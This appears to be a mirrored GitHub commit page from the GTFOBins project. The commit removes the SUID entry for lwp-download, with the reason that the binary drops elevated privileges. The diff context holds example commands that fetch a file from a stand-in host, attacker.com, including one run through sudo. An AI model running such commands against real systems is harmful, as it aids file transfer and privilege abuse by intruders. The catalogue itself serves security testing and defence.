mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Update lwp-download.md
lwp-download drop the elevated privileges
This commit is contained in:
parent
494ea89794
commit
313a49d9f7
@ -6,11 +6,6 @@ functions:
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
lwp-download $URL $LFILE
|
||||
suid:
|
||||
- code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
LFILE=file_to_save
|
||||
./lwp-download $URL $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
URL=http://attacker.com/file_to_get
|
||||
|
Loading…
Reference in New Issue
Block a user